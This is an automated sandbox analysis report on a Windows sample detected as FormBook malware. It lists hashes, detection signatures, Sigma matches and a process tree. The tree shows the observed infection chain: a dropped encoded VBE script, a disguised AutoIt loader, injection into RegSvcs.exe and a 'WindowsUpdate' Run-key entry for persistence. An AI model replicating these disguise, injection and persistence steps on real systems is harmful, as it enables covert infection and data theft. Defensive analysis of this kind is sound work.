Windows Analysis Report
FX6KTgnipP.exe

Overview

General Information

Sample name: FX6KTgnipP.exe (renamed because the original name is a hash value)
Original sample name: 6d414885d7f75777705948ed9a7134421d7cc2eabb4c4591b913864e8642850a.exe
Analysis ID: 1569431
MD5: 09ac9eae3546e42f6bbcc605242133d0
SHA1: ca07478bd504d2c690948e9c21771ec5ac4de018
SHA256: 6d414885d7f75777705948ed9a7134421d7cc2eabb4c4591b913864e8642850a
Tags: exe, Formbook, user-adrian__luca

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected AntiVM autoit script
Yara detected Autoit Injector
Yara detected FormBook
AI detected suspicious sample
Allocates memory in foreign processes
Contains functionality to inject code into remote processes
Found API chain indicative of sandbox detection
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses ipconfig to lookup or modify the Windows network settings
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query the security center for anti-virus and firewall products
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
One or more processes crash
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: Use NTFS Short Name in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Sigma detected: Wow6432Node CurrentVersion Autorun Keys Modification
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • FX6KTgnipP.exe (PID: 2168 cmdline: "C:\Users\user\Desktop\FX6KTgnipP.exe" MD5: 09AC9EAE3546E42F6BBCC605242133D0)
    • wscript.exe (PID: 1268 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 3320 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /release MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 1692 cmdline: ipconfig /release MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
      • cmd.exe (PID: 1796 cmdline: "C:\Windows\System32\cmd.exe" /c dmqiuorkt.mp2 tdggoffi.bin MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 4696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • dmqiuorkt.mp2 (PID: 1212 cmdline: dmqiuorkt.mp2 tdggoffi.bin MD5: 0ADB9B817F1DF7807576C2D7068DD931)
          • RegSvcs.exe (PID: 2292 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
          • RegSvcs.exe (PID: 3236 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
            • dmqiuorkt.mp2.exe (PID: 2788 cmdline: "C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE" C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin MD5: 0ADB9B817F1DF7807576C2D7068DD931)
              • UserAccountControlSettings.exe (PID: 2632 cmdline: "C:\Windows\SysWOW64\UserAccountControlSettings.exe" MD5: 5AEA4CD2B6CA1E44E27D1A95917FEE60)
                • explorer.exe (PID: 3504 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
              • RegSvcs.exe (PID: 1544 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
              • RegSvcs.exe (PID: 3656 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
                • WerFault.exe (PID: 5664 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3656 -s 196 MD5: C31336C1EFC2CCB44B4326EA793040F2)
      • cmd.exe (PID: 3632 cmdline: "C:\Windows\System32\cmd.exe" /c ipconfig /renew MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 2552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • ipconfig.exe (PID: 2320 cmdline: ipconfig /renew MD5: 3A3B9A5E00EF6A3F83BF300E2B6B67BB)
  • dmqiuorkt.mp2.exe (PID: 6808 cmdline: "C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE" C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin MD5: 0ADB9B817F1DF7807576C2D7068DD931)
    • RegSvcs.exe (PID: 3152 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 3900 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • dmqiuorkt.mp2.exe (PID: 6900 cmdline: "C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE" C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin MD5: 0ADB9B817F1DF7807576C2D7068DD931)
    • RegSvcs.exe (PID: 5936 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 616 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000016.00000002.3767911747.0000000004600000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000E.00000002.2206585761.0000000001880000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000016.00000002.3767954068.0000000004650000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000E.00000002.2206998691.0000000001DE0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
0000000E.00000002.2206251852.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(5 of 9 entries shown)

Source | Rule | Description | Author | Strings
14.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
14.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

System Summary

Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 1268, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 3320, ProcessName: cmd.exe
Source: Process started | Author: Jonathan Cheong, oscd.community | Data: Command: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , ParentImage: C:\Windows\SysWOW64\wscript.exe, ParentProcessId: 1268, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c ipconfig /release , ProcessId: 3320, ProcessName: cmd.exe
Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe, ProcessId: 6808, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
Source: Process started | Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\FX6KTgnipP.exe", ParentImage: C:\Users\user\Desktop\FX6KTgnipP.exe, ParentProcessId: 2168, ParentProcessName: FX6KTgnipP.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , ProcessId: 1268, ProcessName: wscript.exe
Source: Process started | Author: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\FX6KTgnipP.exe", ParentImage: C:\Users\user\Desktop\FX6KTgnipP.exe, ParentProcessId: 2168, ParentProcessName: FX6KTgnipP.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , ProcessId: 1268, ProcessName: wscript.exe
Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\FX6KTgnipP.exe", ParentImage: C:\Users\user\Desktop\FX6KTgnipP.exe, ParentProcessId: 2168, ParentProcessName: FX6KTgnipP.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , ProcessId: 1268, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe, ProcessId: 6808, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
Source: Process started | Author: Max Altgelt (Nextron Systems) | Data: Command: dmqiuorkt.mp2 tdggoffi.bin, CommandLine: dmqiuorkt.mp2 tdggoffi.bin, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2, NewProcessName: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2, OriginalFileName: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c dmqiuorkt.mp2 tdggoffi.bin, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1796, ParentProcessName: cmd.exe, ProcessCommandLine: dmqiuorkt.mp2 tdggoffi.bin, ProcessId: 1212, ProcessName: dmqiuorkt.mp2
Source: Process started | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE" C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin, CommandLine: "C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE" C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3504, ProcessCommandLine: "C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE" C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin, ProcessId: 6808, ProcessName: dmqiuorkt.mp2.exe
Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\FX6KTgnipP.exe", ParentImage: C:\Users\user\Desktop\FX6KTgnipP.exe, ParentProcessId: 2168, ParentProcessName: FX6KTgnipP.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\RarSFX0\isci.vbe" , ProcessId: 1268, ProcessName: wscript.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Local\Temp\oqck\DMQIUO~1.EXE C:\Users\user\AppData\Local\Temp\oqck\tdggoffi.bin, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2, ProcessId: 1212, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\WindowsUpdate
No Suricata rule has matched


AV Detection

Source: FX6KTgnipP.exe | ReversingLabs: Detection: 71%
Source: Yara match | File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000016.00000002.3767911747.0000000004600000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2206585761.0000000001880000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000016.00000002.3767954068.0000000004650000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2206998691.0000000001DE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.2206251852.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.2345409248.00000000038A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: FX6KTgnipP.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: FX6KTgnipP.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: FX6KTgnipP.exe
Source: Binary string: UserAccountControlSettings.pdbGCTL source: RegSvcs.exe, 0000000E.00000002.2206467110.0000000001538000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2166226808.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2165340743.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: UserAccountControlSettings.pdb source: RegSvcs.exe, 0000000E.00000002.2206467110.0000000001538000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2166226808.0000000000DB4000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 00000012.00000003.2165340743.0000000000D9F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 0000000E.00000002.2206645455.0000000001990000.00000040.00001000.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000002.3768152114.0000000004960000.00000040.00001000.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000003.2261587798.00000000047B4000.00000004.00000020.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000003.2223900833.0000000004608000.00000004.00000020.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000002.3768152114.0000000004AFE000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 0000000E.00000002.2206645455.0000000001990000.00000040.00001000.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000002.3768152114.0000000004960000.00000040.00001000.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000003.2261587798.00000000047B4000.00000004.00000020.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000003.2223900833.0000000004608000.00000004.00000020.00020000.00000000.sdmp, UserAccountControlSettings.exe, 00000016.00000002.3768152114.0000000004AFE000.00000040.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\FX6KTgnipP.exe | Code function: 0_2_0024F826 __EH_prolog3_GS,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_0024F826
Source: C:\Users\user\Desktop\FX6KTgnipP.exe | Code function: 0_2_00261630 __EH_prolog3_GS,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,0_2_00261630
Source: C:\Users\user\Desktop\FX6KTgnipP.exe | Code function: 0_2_00271FF8 FindFirstFileExA,0_2_00271FF8
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: 7_2_008BE387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,7_2_008BE387
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: 7_2_008BD836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_008BD836
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: 7_2_008BDB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,7_2_008BDB69
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: 7_2_008C9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_008C9F9F
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: 7_2_008CA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,7_2_008CA0FA
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: 7_2_008CA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,7_2_008CA488
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: 7_2_008C65F1 FindFirstFileW,FindNextFileW,FindClose,7_2_008C65F1
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: 7_2_0088C642 FindFirstFileExW,7_2_0088C642
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: 7_2_008C72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,7_2_008C72E9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: 7_2_008C7248 FindFirstFileW,FindClose,7_2_008C7248
Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_0039E387 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,15_2_0039E387
Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_0039D836 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_0039D836
Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_0039DB69 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,15_2_0039DB69
Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_003A9F9F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_003A9F9F
Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_003AA0FA SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,15_2_003AA0FA
Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_003AA488 FindFirstFileW,Sleep,FindNextFileW,FindClose,15_2_003AA488
Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_003A65F1 FindFirstFileW,FindNextFileW,FindClose,15_2_003A65F1
Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_0036C642 FindFirstFileExW,15_2_0036C642
Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_003A7248 FindFirstFileW,FindClose,15_2_003A7248
Source: C:\Users\user\AppData\Local\Temp\oqck\dmqiuorkt.mp2.exe | Code function: 15_2_003A72E9 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,15_2_003A72E9
Source: C:\Users\user\AppData\Local\Temp\RarSFX0\dmqiuorkt.mp2 | Code function: 7_2_008CD7A1 InternetReadFile,SetEvent,GetLastError,SetEvent,7_2_008CD7A1
Source: explorer.exe, 00000020.00000000.3696594073.00000000087BB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000002.3833424525.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000020.00000000.3696594073.0000000008685000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.000000000110A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.0000000001107000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1714657864.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe0.7.dr | String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.000000000110A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.0000000001107000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1714657864.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe0.7.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.000000000110A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.0000000001107000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1714657864.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe0.7.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.000000000110A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.0000000001107000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1714657864.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe0.7.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: FX6KTgnipP.exe, 00000000.00000003.1394224058.00000000071D3000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1524367962.000000000110A000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2, 00000007.00000003.1523500651.0000000001107000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe, 0000000F.00000003.1714657864.00000000017D2000.00000004.00000020.00020000.00000000.sdmp, dmqiuorkt.mp2.exe0.7.dr | String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
